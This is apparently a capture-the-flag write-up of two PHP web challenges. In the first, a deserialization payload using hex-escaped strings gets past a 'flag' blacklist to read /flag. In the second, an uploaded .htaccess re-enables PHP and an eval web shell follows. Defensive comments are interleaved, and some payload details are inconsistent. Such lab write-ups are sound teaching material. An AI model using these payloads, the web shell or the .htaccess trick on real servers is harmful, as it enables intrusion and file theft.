Web#

power_cut#

  1. .index.php.swp
    <?php
    // Log helper. weblog::__wakeup() constructs one of these with the
    // deserialized $weblogfile, so a caller-supplied path ends up in the
    // readfile() call below: the file's bytes are written straight into the
    // response. No path validation happens anywhere in this class.
    class logger{
    public $logFile;   // path handed to readfile() and fopen()
    public $initMsg;   // assigned in the constructor, never read in this listing
    public $exitMsg;   // assigned in the constructor, never read in this listing

    /**
     * @param string $file path to echo back on construction and append to in log()
     */
    function __construct($file){
    // initialise variables
    $this->initMsg="#--session started--#\n";
    $this->exitMsg="#--session end--#\n";
    $this->logFile = $file;
    // Side effect on construction: outputs the whole file. The return value
    // is unchecked, so an unreadable path only produces a warning.
    readfile($this->logFile);

    }

    /**
     * Appends $msg plus a newline to $logFile.
     * fopen() failure is not checked; on PHP 8 fwrite(false, ...) throws a TypeError.
     * @param string $msg
     */
    function log($msg){
    $fd=fopen($this->logFile,"a+");
    fwrite($fd,$msg."\n");
    fclose($fd);
    }

    // Runs when the object is released, including at script end for an
    // instance created during unserialize().
    function __destruct(){
    echo "this is destruct";
    }
    }

    // Gadget class for the unserialize() sink at the bottom of this file.
    // unserialize() does not call __construct; it calls __wakeup(), which
    // builds a logger from the deserialized $weblogfile.
    class weblog {
    public $weblogfile;  // attacker-controlled once the object comes from unserialize()

    // Only runs on an explicit `new weblog()`. The string is echoed verbatim:
    // system() sits inside the quotes and is never executed.
    function __construct() {
    $flag="system('cat /flag')";
    echo "$flag";
    }

    // Called by unserialize(). The waf() call is commented out (and names
    // $filepath, a property this class does not have), so $weblogfile reaches
    // logger::__construct() -> readfile() with only the character blacklist
    // applied to the raw serialized string at the bottom of the file.
    function __wakeup(){
    // self::waf($this->filepath);
    $obj = new logger($this->weblogfile);
    }

    // Character blacklist: strips < > * # ' | ? newline and space, then the
    // literal "flag". Not called anywhere in this listing. Filtering bytes of
    // a serialized string does not constrain the decoded object; the real
    // control is unserialize()'s allowed_classes option or a JSON format.
    public function waf($str){
    $str=preg_replace("/[<>*#'|?\n ]/","",$str);
    $str=str_replace('flag','',$str);
    return $str;
    }

    // Runs when the object is released, including at script end for an
    // instance created during unserialize().
    function __destruct(){
    echo "this is destruct";
    }

    }


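    // Deserialization sink: `log` comes straight from the query string.
    // `?? ''` avoids the undefined-index warning (and null reaching preg_replace,
    // deprecated since 8.1) when the parameter is absent; the end result is the
    // same as before — unserialize('') returns false.
    $log = $_GET['log'] ?? '';
    // Same blacklist as weblog::waf(): strips < > * # ' | ? newline space, then "flag".
    $log = preg_replace("/[<>*#'|?\n ]/","",$log);
    $log = str_replace('flag','',$log);
    // SECURITY: unserialize() on request data instantiates any class in scope and
    // runs its __wakeup()/__destruct() (here weblog -> logger -> readfile()).
    // The byte blacklist above does not constrain the decoded object. Mitigation:
    // unserialize($log, ['allowed_classes' => false]) or use json_decode() instead.
    $log_unser = unserialize($log);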

    ?>

    <html>
    <body>
    <p><br/>昨天晚上因为14级大风停电了.</p>
    </body>
    </html>

  2. 构造反序列化payload(S \hex)
    // Builds the object and prints its default serialization (plain s: string).
    // `new weblog()` also runs the constructor echo.
    $log = new weblog();
    $log->weblogfile = '/flag';
    echo serialize($log);
    // Hand-edited form using the S: (escaped) string type, so the server-side
    // literal "flag" match does not see the word on the wire. Lesson for the
    // defender: a blacklist on serialized text is not a control.
    // NOTE(review): \73 decodes to 's' (giving "/slag"); the request in step 3
    // sends \66 ('f'). One of the two looks like a transcription slip — verify.
    $s = 'O:6:"weblog":1:{s:10:"weblogfile";S:5:"/\73lag";}';
    echo urlencode($s);
  3. get flag
    http://119.3.128.126:32800/?log=O%3A6%3A%22weblog%22%3A1%3A%7Bs%3A10%3A%22weblogfile%22%3BS%3A5%3A%22%2F%5C66lag%22%3B%7D

UploadHub#

  1. index.php 后缀名过滤 in_array 代码错误,上传任意后缀文件
  2. 上传 .htaccess 重新打开 php engine
    # Uploaded .htaccess: turns the PHP engine back on for files whose name
    # matches "index" and prepends this file to every PHP script it governs.
    # Defender note: serve upload directories with AllowOverride None so a
    # user-supplied .htaccess is ignored, and set php_admin_flag engine off in
    # the server config, where a per-directory file cannot override it.
    <FilesMatch "index"> 
    php_flag engine on
    </FilesMatch>
    php_value auto_prepend_file ".htaccess"
  3. 上传 php webshell index.php
    <?php
    // Web shell: evaluates the `cmd` request parameter as PHP code.
    // Detection: any PHP file appearing under an upload root, or requests to it
    // carrying a `cmd` parameter, is a high-fidelity indicator; the control is
    // never letting uploaded files execute (engine off, served from a non-PHP host).
    eval($_REQUEST[cmd]); ?>
  4. index.php?cmd=?cmd=echo%20file_get_contents(%27/flag%27);